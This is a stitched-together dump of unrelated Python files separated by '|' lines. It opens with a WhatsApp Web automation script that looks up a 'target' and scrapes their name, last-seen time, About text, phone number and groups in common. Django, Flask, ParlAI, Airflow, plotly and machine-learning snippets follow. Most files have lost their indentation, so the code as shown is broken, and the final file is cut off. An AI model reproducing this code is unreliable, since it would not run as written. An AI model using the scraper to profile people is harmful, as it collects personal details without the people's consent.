await page.type(whatsapp_selectors_dict['chat_or_message_search'], target)
await page.waitFor(3000)
except Exception as e:
print(e)
async def __get_chats_messages_groups_elements(page):
    chats_messages_groups_elements_list = []  # list of chat/message/group element handles
try:
chats_messages_groups_elements_list = await page.querySelectorAll\
(whatsapp_selectors_dict['chats_groups_messages_elements'])
return chats_messages_groups_elements_list
except Exception as e:
print(e)
exit()
async def __get_contacts_matched_with_query(chats_groups_messages_elements_list):
    contacts_to_choose_from = []  # list of (contact_name, index) tuples
get_contact_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
contact_name = await element.querySelectorEval(whatsapp_selectors_dict['contact_element'],get_contact_node_title_function)
contacts_to_choose_from.append((contact_name,idx))
except ElementHandleError:
# if it is not a contact element, move to the next one
continue
except Exception as e:
print(e)
return contacts_to_choose_from
async def __get_groups_matched_with_query(chats_groups_messages_elements_list, hide_groups):
groups_to_choose_from = []
if hide_groups:
return groups_to_choose_from
get_group_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
group_name = await element.querySelectorEval(whatsapp_selectors_dict['group_element'],
get_group_node_title_function)
groups_to_choose_from.append((group_name,idx))
except ElementHandleError:
# if it is not a contact element, move to the next one
continue
except Exception as e:
print(e)
return groups_to_choose_from
async def __open_selected_chat(target_index,chats_messages_groups_elements_list):
try:
await chats_messages_groups_elements_list[target_index].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
exit()
async def get_complete_info_on_target(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['target_chat_header'],
visible=True,
timeout=3000
)
await page.click(whatsapp_selectors_dict['target_chat_header'])
contact_page_elements = await get_contact_page_elements(page)
complete_target_info = {}
await get_contact_name_info(contact_page_elements[0], complete_target_info)
await get_contact_about_and_phone(contact_page_elements[3], complete_target_info)
await get_contact_groups_common_with_target(complete_target_info, page)
except Exception as e:
print(e)
return complete_target_info
async def get_contact_page_elements(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_elements'],
visible=True,
timeout=8000
)
contact_page_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_elements'])
except Exception as e:
print(e)
return contact_page_elements
async def get_contact_name_info(contact_name_element,complete_target_info):
try:
complete_target_info['Name'] = await contact_name_element.querySelectorEval('span > span', 'element => element.innerText')
complete_target_info['Last_seen'] = await contact_name_element.querySelectorEval('div > span:last-of-type > div > span', 'element => element.getAttribute("title")')
except:
        print('last seen not available')
async def get_contact_about_and_phone(contact_name_element, complete_target_info):
try:
complete_target_info['About'] = await contact_name_element.querySelectorEval('div:nth-child(2) > div > div > span > span', 'element => element.getAttribute("title")')
complete_target_info['Mobile'] = await contact_name_element.querySelectorEval('div:last-of-type > div > div > span > span', 'element => element.innerText')
except Exception as e:
print(e)
async def get_contact_groups_common_with_target(complete_target_info,page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_group_element_heading'],
visible= True,
timeout=3000
)
if (await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["contact_info_page_group_element_heading"]}").innerText'))\
== "Groups in common":
group_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_group_elements'])
complete_target_info['Groups'] = [await ele.querySelectorEval('div>div>div:nth-child(2)>div:first-child>div>div>span', 'e => e.getAttribute("title")') for ele in group_elements]
else:
complete_target_info['Groups'] = []
except:
complete_target_info['Groups'] = []
        print('No groups in common')
async def close_contact_info_page(page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_close_button'],
visible = True,
timeout = 5000
)
await page.click(whatsapp_selectors_dict['contact_info_page_close_button'])
except Exception as e:
print(e)
def print_complete_target_info(complete_target_info):
for key in complete_target_info.keys():
if key == "Groups":
print("Groups:")
print(*complete_target_info[key], sep=",")
else:
print(f'{key}: {complete_target_info[key]} ')
async def __open_new_chat(page):
await page.waitForSelector(
whatsapp_selectors_dict['new_chat_button'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.click(whatsapp_selectors_dict['new_chat_button'])
async def __type_in_new_chat_search_bar(page, target):
print(f'Looking for: {target}')
logger.info('Searching Target')
await page.waitForSelector(
whatsapp_selectors_dict['search_contact_input_new_chat'],
visible=True
)
await page.type(whatsapp_selectors_dict['search_contact_input_new_chat'], target)
await page.waitFor(3000)
async def __get_contacts_elements_filtered(page, target):
contact_list_elements_unchecked = list()
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
contact_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat']
)
except:
        print(f'No contact named "{target}"!')
logger.info('Target not found')
return contact_list_elements_unchecked
async def __get_groups_elements_filtered(page, target, hide_groups=False):
group_list_elements_unchecked = list()
if hide_groups:
return group_list_elements_unchecked
try:
await page.waitForSelector(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
group_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat']
)
except:
        print(f'No group named "{target}"!')
logger.info('Target not found in groups')
return group_list_elements_unchecked
async def __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked):
contact_titles_unchecked = []
for i in range(len(contact_list_elements_unchecked)):
contact_titles_unchecked\
.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["contact_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return contact_titles_unchecked
async def __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked):
group_titles_unchecked = []
for i in range(len(group_list_elements_unchecked)):
group_titles_unchecked.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["group_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return group_titles_unchecked
# contact_list_unchecked is a zip (list of tuples) of contact_titles and
# contact elements, unchecked.
def __zip_contact_titles_and_elements_unchecked(contact_titles_unchecked, contact_list_elements_unchecked):
contact_list_unchecked = list(zip(contact_titles_unchecked, contact_list_elements_unchecked))
return contact_list_unchecked
def __zip_group_titles_and_elements_unchecked(group_titles_unchecked, group_list_elements_unchecked):
group_list_unchecked = list(zip(group_titles_unchecked, group_list_elements_unchecked))
return group_list_unchecked
# __check_contact_list verifies that the target appears in each title; entries
# that do not match are popped from the list
def __check_contact_list(target, contact_list_unchecked):
i = 0
while i < len(contact_list_unchecked):
if len(contact_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive contacts
if contact_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
contact_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
contact_tuple = tuple(contact_list_unchecked)
return contact_tuple
def __check_group_list(target, group_list_unchecked):
i = 0
while i < len(group_list_unchecked):
if len(group_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive groups
if group_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
group_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
group_tuple = tuple(group_list_unchecked)
return group_tuple
# target_tuple looks like (((0, 'a'), (1, 'b')), ((3, 'c'), (4, 'd'))),
# but with titles and elements in place of the numbers and letters;
# the first index holds the contacts and the second holds the groups
def __get_target_tuple(contact_tuple, group_tuple):
target_tuple = (contact_tuple, group_tuple)
return target_tuple
def __print_target_tuple(target_tuple):
    length_of_contacts_tuple = len(target_tuple[0])
    length_of_groups_tuple = len(target_tuple[1])
    for i in range(length_of_contacts_tuple):
        if length_of_contacts_tuple <= 0:
            break
        if i == 0:
            print("Contacts found:")
            logger.info('List of Targets')
        print(f'{i}: {target_tuple[0][i][0]}')
    for i in range(length_of_contacts_tuple, length_of_groups_tuple + length_of_contacts_tuple):
        if length_of_groups_tuple <= 0:
            break
        if i == length_of_contacts_tuple:
            print("Groups found:")
            logger.info('List of Target in groups')
        print(f'{i}: {target_tuple[1][i-length_of_contacts_tuple][0]}')
def __ask_user_to_choose_the_filtered_target(target_tuple):
if len(target_tuple[0] + target_tuple[1]) > 0:
logger.info('Input Target Number')
target_index_choosed = int(
input('Enter the number of the target you wish to choose: '))
return target_index_choosed
def __get_choosed_target(target_tuple, target_index_choosed):
    length_of_contacts_tuple = len(target_tuple[0])
    if target_index_choosed is None:
        exit()
    try:
        if target_index_choosed < length_of_contacts_tuple:
            choosed_target = target_tuple[0][target_index_choosed]
        elif target_index_choosed >= length_of_contacts_tuple:
            choosed_target = target_tuple[1][target_index_choosed - length_of_contacts_tuple]
else:
print("This target doesn't exist!")
logger.error('Invalid Target')
exit()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
return choosed_target
async def __navigate_to_target(page, choosed_target):
try:
await choosed_target[1].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
async def __get_focused_target_title(page, target):
try:
await page.waitForSelector(whatsapp_selectors_dict['target_focused_title'])
target_focused_title = await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["target_focused_title"]}").getAttribute("title")')
except Exception as e:
print(f'No target selected! Error: {str(e)}')
logger.error('Target not selected from list')
exit()
return target_focused_title
def __print_selected_target_title(target_focused_title):
print(f"You've selected the target named by: {target_focused_title}")
logger.info('Selected Target')
def __check_target_focused_title(page, target, target_focused_title):
if target_focused_title.lower().find(target.lower()) == -1:
print(f"You're focused in the wrong target, {target_focused_title}")
must_continue = str(input("Do you want to continue (yes/no)? "))
accepted_yes = {'yes', 'y'}
if must_continue.lower() in accepted_yes:
pass
else:
exit()
async def __wait_for_message_area(page):
try:
await page.waitForSelector(whatsapp_selectors_dict['message_area'])
except Exception as e:
print(f"You don't belong this group anymore! Error: {str(e)}")
# endregion
|
def beg(arr):
a = []
b = []
c = []
for i in arr:
if i == 0:
a.append(i)
if i == 1:
b.append(i)
if i == 2:
c.append(i)
return a+b+c
a = []
b = [0,0,0]
c = [1,2,1,1,2,1,2]
d = [0,2,1,0,1,0,2,2,2,1,0,2,1,0,1,2,0]
print(beg(a))
print(beg(b))
print(beg(c))
print(beg(d))
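# Hedged alternative under the same assumption that arr contains only 0s, 1s
# and 2s: a counting pass gives the same sorted result.
def beg_counting(arr):
    counts = [arr.count(v) for v in (0, 1, 2)]  # occurrences of each value
    return [0] * counts[0] + [1] * counts[1] + [2] * counts[2]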
|
from django.apps import AppConfig
class MasterAppConfig(AppConfig):
name = 'msa.contrib.master'
verbose_name = 'Master Service'
|
import importlib
import json
import os
import shutil
import subprocess
from pathlib import Path
from shutil import which
from typing import List, Optional, Tuple
from setuptools import find_packages
from typer import Argument, Option, Typer
from .paths import (
GLOBAL_APP_DIR,
GLOBAL_EXTENSIONS_DIR,
GLOBAL_FRONTEND_DIR,
GLOBAL_QUETZ_DIR,
LOCAL_APP_DIR,
)
from .utils import clean_dir, get_extensions_dir, get_federated_extensions
app = Typer()
@app.command()
def link_frontend(
dev_mode: bool = Option(
False, "--development", help="Whether to install it in dev mode or not"
)
) -> None:
"""Intall the Quetz-Frontend"""
assert LOCAL_APP_DIR.exists()
if not GLOBAL_FRONTEND_DIR.exists():
GLOBAL_FRONTEND_DIR.mkdir(parents=True, exist_ok=True)
if GLOBAL_APP_DIR.exists():
if GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
else:
shutil.rmtree(GLOBAL_APP_DIR)
if dev_mode:
GLOBAL_APP_DIR.symlink_to(LOCAL_APP_DIR)
print(
f"""Symlink created:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
else:
shutil.copytree(LOCAL_APP_DIR, GLOBAL_APP_DIR, symlinks=True)
print(
f"""App directory copied:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
@app.command()
def clean_frontend() -> None:
"""Clean the Quetz-Frontend"""
if GLOBAL_APP_DIR.is_file() or GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
elif GLOBAL_APP_DIR.is_dir():
shutil.rmtree(GLOBAL_APP_DIR)
@app.command()
def install(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(ext_path, True, False)
module, metadata = _get_extensions_metadata(extension_path)
src = Path(extension_path).joinpath(module.__name__, metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(metadata[0]["dest"])
clean_dir(dest)
shutil.copytree(src, dest, symlinks=True)
print(
f"""
Extension installed:
Path: {dest}
"""
)
@app.command()
def develop(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension in dev mode"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, True, False)
_develop_extension(extension_path)
@app.command()
def build(
ext_path: str = Argument(Path(), help="The path of the extension"),
dev_mode: bool = Option(False, "--development", help="Build in development"),
) -> None:
"""Build an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, dev_mode, False)
@app.command()
def watch(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Watch an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_develop_extension(extension_path)
_build_extension(extension_path, True, True)
@app.command()
def uninstall(ext_name: str = Argument("", help="The name of the extension")) -> None:
"""Uninstall an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(GLOBAL_EXTENSIONS_DIR, ext_name)
clean_dir(extension_path)
@app.command()
def list() -> None:
"""List of extensions"""
print(f"Installed extensions:")
print(f"---------------------")
print(f" Installation path: '{GLOBAL_EXTENSIONS_DIR}'\n")
extensions = get_federated_extensions([get_extensions_dir()])
if not extensions:
print("No installed extensions yet")
for ext in extensions.values():
print(f'\t- {Path(ext["ext_path"]).relative_to(GLOBAL_EXTENSIONS_DIR)}')
print()
@app.command()
def clean() -> None:
"""Clean the extensions directory"""
if GLOBAL_EXTENSIONS_DIR.exists():
shutil.rmtree(GLOBAL_EXTENSIONS_DIR)
@app.command()
def paths() -> None:
"""Quetz installation paths"""
print(
f"""
System configured paths:
Quetz: {GLOBAL_QUETZ_DIR}
Frontend: {GLOBAL_FRONTEND_DIR}
App: {GLOBAL_APP_DIR}
Extensions: {GLOBAL_EXTENSIONS_DIR}
"""
)
def _develop_extension(ext_path: Path):
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
_, metadata = _get_extensions_metadata(ext_path)
src = ext_path / ext_data["quetz"].get("outputDir", metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(ext_data["name"])
clean_dir(dest)
# Create parent directory if extension name is scoped
dest.parent.mkdir(parents=True, exist_ok=True)
dest.symlink_to(src)
print(
f"""
Symlink created:
Ori: {src!s}
Dest: {dest!s}
"""
)
def _build_extension(ext_path: Path, dev_mode: bool = False, watch: bool = False):
if not GLOBAL_APP_DIR.joinpath("package.json").exists():
print(f"Quetz frontend not fount at '{GLOBAL_APP_DIR!s}'")
builder_path = _find_builder(ext_path)
if builder_path is None:
print(f"Could not find @quetz-frontend/builder at {ext_path!s}")
print(f"Extensions require a devDependency '@quetz-frontend/builder'")
return
exe = "node"
exe_path = which(exe)
if not exe_path:
print(f"Could not find {exe}. Install NodeJS.")
exit(1)
command = [exe, str(builder_path), "--core-path", str(GLOBAL_APP_DIR.resolve())]
if dev_mode:
command.append("--development")
command.append("--source-map")
if watch:
command.append("--watch")
command.append(str(ext_path))
print("Building extension")
subprocess.check_call(command)
def _find_builder(ext_path: Path) -> Optional[Path]:
"""Find the package '@quetz-frontend/builder' in the extension dependencies"""
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
depVersion2 = ext_data.get("devDependencies", dict()).get("@quetz-frontend/builder")
depVersion2 = depVersion2 or ext_data.get("dependencies", dict()).get(
"@quetz-frontend/builder"
)
if depVersion2 is None:
return None
# Find @quetz-frontend/builder in the node_modules directory
target = ext_path
while not (target / "node_modules" / "@quetz-frontend" / "builder").exists():
if target.parent == target:
return None
target = target.parent
return (
target
/ "node_modules"
/ "@quetz-frontend"
/ "builder"
/ "lib"
/ "build-quetzextension.js"
)
def _get_extensions_metadata(
module_path: Path,
) -> Tuple["importlib.ModuleType", List[str]]:
mod_path = module_path.resolve()
if not mod_path.exists():
raise FileNotFoundError(f"The path `{mod_path!s}` does not exist.")
# TODO: Change function name to match lab
try:
module = importlib.import_module(str(module_path))
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
else:
module = None
except Exception:
module = None
# Looking for modules in the package
packages = find_packages(str(mod_path))
for package in packages:
try:
module = importlib.import_module(package)
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
except Exception:
module = None
    raise ModuleNotFoundError(f"There is no extension at {module_path}")
if __name__ == "__main__":
app()
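# Hedged CLI sketch (the installed entry-point name is an assumption, not
# taken from this file):
#   quetz-frontend install ./my-extension
#   quetz-frontend list
#   quetz-frontend paths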
|
from socorepo.locators import github_tags, nexus3, pypi
LOCATOR_PARSERS = {
"github_tags": github_tags.parse_locator,
"nexus3": nexus3.parse_locator,
"pypi": pypi.parse_locator
}
|
from flask import Flask, render_template, request
import json
import os
import requests
app = Flask(__name__)
@app.route('/')
def stop_words():
URL_prefix = 'https://api.github.com/search/code?q='
URL_suffix = '+repo:spotify/mkdocs-monorepo-plugin/docs'
reportfile = open('./templates/stopWordsSearch.html', 'w')
reportfile.write('<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/bootstrap.min.css">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/common.css">')
reportfile.write('<script src="../static/jquery.min.js"></script>')
reportfile.write('<script src="../static/popper.min.js"></script>')
reportfile.write('<script src="../static/bootstrap.min.js"></script>')
reportfile.write('<title>Stop-words Search</title></head>')
reportfile.write('<body><div class="container"><h1>Stop-words Search</h1>')
fname = './static/wordList.txt'
wordlist = []
explainlist = []
print("\n")
print('Reading the word list ...\n')
fwordlist = open(fname, 'r')
for line in fwordlist:
colon = line.find(':')
word = line[0:(colon)]
explain = line[(colon + 1):]
explain = explain.rstrip()
print(word)
print(explain)
wordlist.append(word)
explainlist.append(explain)
fwordlist.close()
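    # Hedged note on the expected wordList.txt format (entries invented):
    # one "word:explanation" pair per line, e.g.
    #   just:Avoid "just"; it can sound dismissive to readers.
    #   simply:Avoid "simply"; what is simple for you may not be for everyone.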
print(wordlist)
print(explainlist)
x = len(wordlist)
print('\nNo. of words and phrases to search for: ', x)
try:
reportfile.write('<p class="lead">Consider reviewing the occurrences of the following words in the documentation.</p><hr/>')
wordpos = 0
for word in wordlist:
url_string = URL_prefix + word + URL_suffix
r = requests.get(url_string)
json_data = json.loads(json.dumps(r.json()))
print(json_data)
if len(json_data['items']) != 0:
print(word)
reportfile.write('<div class="container">')
reportfile.write('<h2>' + word + '</h2>')
print(explainlist[wordpos])
reportfile.write('<p>' + explainlist[wordpos] + '</p>')
print(json_data['total_count'], 'instances of', word)
reportfile.write('<p>' + str(json_data['total_count']) + ' instances of <mark>' + word + '</mark> found in the following files:</p>')
reportfile.write('<ul>')
for line in json_data['items']:
for k, v in line.items():
if k == 'path':
print(v)
reportfile.write('<li>' + v + '</li>')
print('--------\n')
reportfile.write('</ul>')
reportfile.write('</div>')
reportfile.write('<hr/>')
wordpos = wordpos + 1
except:
reportfile.write("<p class='text-danger'>>>>>> If you're seeing these lines, it means you've hit the API rate limits for GitHub search and the Stopwords search was abandoned.</p>")
#reportfile.write("<p class='text-danger'>Had the search been completed, you would've got an output shown in the following image.</p>")
#reportfile.write('<img src="../static/stopWords.png"/>')
reportfile.write("<p class='text-danger'>Maybe choose a smaller documentation repository for your search?</p>")
reportfile.write("<p class='text-danger'>But then, this is just a demo and you get the general idea, I hope? <<<<<")
reportfile.write("</div></body>")
reportfile.write("</html>")
reportfile.close()
return render_template('stopWordsSearch.html')
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
#app.run()
|
from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import signals
from django.utils.encoding import smart_text
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
"""
Creates content types for models in the given app, removing any model
entries that no longer have a matching model class.
"""
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = dict(
(model._meta.model_name, model)
for model in app_config.get_models())
if not app_models:
return
# Get all the content types
content_types = dict(
(ct.model, ct)
for ct in ContentType.objects.using(using).filter(app_label=app_label)
)
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
name=smart_text(model._meta.verbose_name_raw),
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
# Confirm that the content type is stale before deletion.
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
def update_all_contenttypes(**kwargs):
for app_config in apps.get_app_configs():
update_contenttypes(app_config, **kwargs)
signals.post_migrate.connect(update_contenttypes)
if __name__ == "__main__":
update_all_contenttypes()
|
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from worlds import \
PersonaChatWorld, PersonaProfileWorld, PersonasGenerator
from task_config import task_config
import os
def main():
"""This task consists of one agent, model or MTurk worker, talking to an
MTurk worker to negotiate a deal.
"""
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument('-min_t', '--min_turns', default=5, type=int,
help='minimum number of turns')
argparser.add_argument('-mt', '--max_turns', default=10, type=int,
                           help='maximum number of chat turns')
argparser.add_argument('-mx_rsp_time', '--max_resp_time', default=150,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('-mx_psn_time', '--max_persona_time', type=int,
                           default=300, help='time limit for turker '
                           'entering the persona')
argparser.add_argument('--ag_shutdown_time', default=120,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('--persona-type', default='both', type=str,
choices=['both', 'self', 'other'],
help='Which personas to load from personachat')
argparser.add_argument('--revised', default=False, type='bool',
help='Whether to use revised personas')
argparser.add_argument('-rt', '--range_turn', default='5,7',
help='sample range of number of turns')
argparser.add_argument('--personas-path', default=None,
help='specify path for personas data')
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if not opt.get('personas_path'):
opt['personas_path'] = argparser.parlai_home + '/parlai/mturk/personachat_chat/data'
opt.update(task_config)
opt['extract_personas_path'] = os.path.join(opt['datapath'], 'personachat_chat')
mturk_agent_ids = ['PERSON_1', 'PERSON_2']
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=mturk_agent_ids
)
persona_generator = PersonasGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.create_hits()
if not opt['is_sandbox']:
blocked_worker_list = []
for w in blocked_worker_list:
mturk_manager.block_worker(w, 'We found that you have unexpected behaviors in our previous HITs. For more questions please email us.')
def run_onboard(worker):
worker.persona_generator = persona_generator
world = PersonaProfileWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for index, worker in enumerate(workers):
worker.id = mturk_agent_ids[index % len(mturk_agent_ids)]
def run_conversation(mturk_manager, opt, workers):
agents = [workers[0], workers[1]]
conv_idx = mturk_manager.conversation_index
world = PersonaChatWorld(
opt=opt,
agents=agents,
range_turn=[int(s) for s in opt['range_turn'].split(',')],
max_turn=opt['max_turns'],
max_resp_time=opt['max_resp_time'],
world_tag='conversation t_{}'.format(conv_idx)
)
world.reset_random()
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Logistic Regression Gradient Descent
"""
import numpy as np
class LogisticRegressionGD(object):
"""Logistic Regression Classifier using gradient descent.
Parameters
------------
eta : float
Learning rate (between 0.0 and 1.0)
n_iter : int
Passes over the training dataset.
random_state : int
Random number generator seed for random weight
initialization.
Attributes
-----------
w_ : 1d-array
Weights after fitting.
cost_ : list
Logistic cost function value in each epoch.
"""
def __init__(self, eta=0.05, n_iter=100, random_state=1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X, y):
""" Fit training data.
Parameters
----------
X : {array-like}, shape = [n_examples, n_features]
Training vectors, where n_examples is the number of
examples and n_features is the number of features.
y : array-like, shape = [n_examples]
Target values.
Returns
-------
self : object
"""
rgen = np.random.RandomState(self.random_state)
self.w_ = rgen.normal(loc=0.0, scale=0.01,
size=1 + X.shape[1])
self.cost_ = []
for i in range(self.n_iter):
net_input = self.net_input(X)
output = self.activation(net_input)
errors = (y - output)
self.w_[1:] += self.eta * X.T.dot(errors)
self.w_[0] += self.eta * errors.sum()
# note that we compute the logistic `cost` now
# instead of the sum of squared errors cost
cost = (-y.dot(np.log(output)) -
((1 - y).dot(np.log(1 - output))))
self.cost_.append(cost)
return self
def net_input(self, X):
"""Calculate net input"""
return np.dot(X, self.w_[1:]) + self.w_[0]
def activation(self, z):
"""Compute logistic sigmoid activation"""
return 1. / (1. + np.exp(-np.clip(z, -250, 250)))
def predict(self, X):
"""Return class label after unit step"""
return np.where(self.net_input(X) >= 0.0, 1, 0)
# equivalent to:
# return np.where(self.activation(self.net_input(X))
# >= 0.5, 1, 0)
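# Hedged usage sketch on synthetic data (not from the original source):
if __name__ == "__main__":
    X = np.array([[0.0], [1.0], [2.0], [3.0]])
    y = np.array([0, 0, 1, 1])
    clf = LogisticRegressionGD(eta=0.1, n_iter=500, random_state=1).fit(X, y)
    print(clf.predict(np.array([[0.5], [2.5]])))  # expected: [0 1]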
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`."""
import warnings
# pylint: disable=unused-import
from airflow.providers.mysql.hooks.mysql import MySqlHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`.",
DeprecationWarning, stacklevel=2
)
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tiling(_BaseTraceHierarchyType):
# flip
# ----
@property
def flip(self):
"""
Determines if the positions obtained from solver are flipped on
each axis.
The 'flip' property is a flaglist and may be specified
as a string containing:
- Any combination of ['x', 'y'] joined with '+' characters
(e.g. 'x+y')
Returns
-------
Any
"""
return self["flip"]
@flip.setter
def flip(self, val):
self["flip"] = val
# packing
# -------
@property
def packing(self):
"""
Determines d3 treemap solver. For more info please refer to
https://github.com/d3/d3-hierarchy#treemap-tiling
The 'packing' property is an enumeration that may be specified as:
- One of the following enumeration values:
['squarify', 'binary', 'dice', 'slice', 'slice-dice',
'dice-slice']
Returns
-------
Any
"""
return self["packing"]
@packing.setter
def packing(self, val):
self["packing"] = val
# pad
# ---
@property
def pad(self):
"""
Sets the inner padding (in px).
The 'pad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
